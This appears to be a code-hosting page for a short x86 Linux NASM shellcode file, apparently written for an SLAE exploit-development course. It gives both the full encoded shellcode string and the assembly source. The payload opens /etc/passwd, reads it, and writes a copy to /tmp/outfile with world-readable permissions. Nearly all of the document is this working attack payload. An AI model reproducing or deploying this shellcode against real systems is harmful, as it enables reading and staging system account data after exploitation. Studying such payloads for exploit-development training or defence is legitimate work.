52 lines
No EOL
1.2 KiB
NASM
52 lines
No EOL
1.2 KiB
NASM
;Description: Copy /etc/passwd to /tmp/outfile (97 bytes)
|
|
;Shellcode: \x31\xc0\xb0\x05\x31\xc9\x51\x68\x73\x73\x77\x64\x68\x63\x2f\x70\x61\x68\x2f\x2f\x65\x74\x8d\x5c\x24\x01\xcd\x80\x89\xc3\xb0\x03\x89\xe7\x89\xf9\x66\x6a\xff\x5a\xcd\x80\x89\xc6\x6a\x05\x58\x31\xc9\x51\x68\x66\x69\x6c\x65\x68\x2f\x6f\x75\x74\x68\x2f\x74\x6d\x70\x89\xe3\xb1\x42\x66\x68\xa4\x01\x5a\xcd\x80\x89\xc3\x6a\x04\x58\x89\xf9\x89\xf2\xcd\x80\x31\xc0\x31\xdb\xb0\x01\xb3\x05\xcd\x80
|
|
;Author: Paolo Stivanin <https://github.com/polslinux>
|
|
;SLAE ID: 526
|
|
|
|
global _start
|
|
section .text
|
|
_start:
|
|
xor eax,eax
|
|
mov al,0x5
|
|
xor ecx,ecx
|
|
push ecx
|
|
push 0x64777373
|
|
push 0x61702f63
|
|
push 0x74652f2f
|
|
lea ebx,[esp +1]
|
|
int 0x80
|
|
|
|
mov ebx,eax
|
|
mov al,0x3
|
|
mov edi,esp
|
|
mov ecx,edi
|
|
push WORD 0xffff
|
|
pop edx
|
|
int 0x80
|
|
mov esi,eax
|
|
|
|
push 0x5
|
|
pop eax
|
|
xor ecx,ecx
|
|
push ecx
|
|
push 0x656c6966
|
|
push 0x74756f2f
|
|
push 0x706d742f
|
|
mov ebx,esp
|
|
mov cl,0102o
|
|
push WORD 0644o
|
|
pop edx
|
|
int 0x80
|
|
|
|
mov ebx,eax
|
|
push 0x4
|
|
pop eax
|
|
mov ecx,edi
|
|
mov edx,esi
|
|
int 0x80
|
|
|
|
xor eax,eax
|
|
xor ebx,ebx
|
|
mov al,0x1
|
|
mov bl,0x5
|
|
int 0x80 |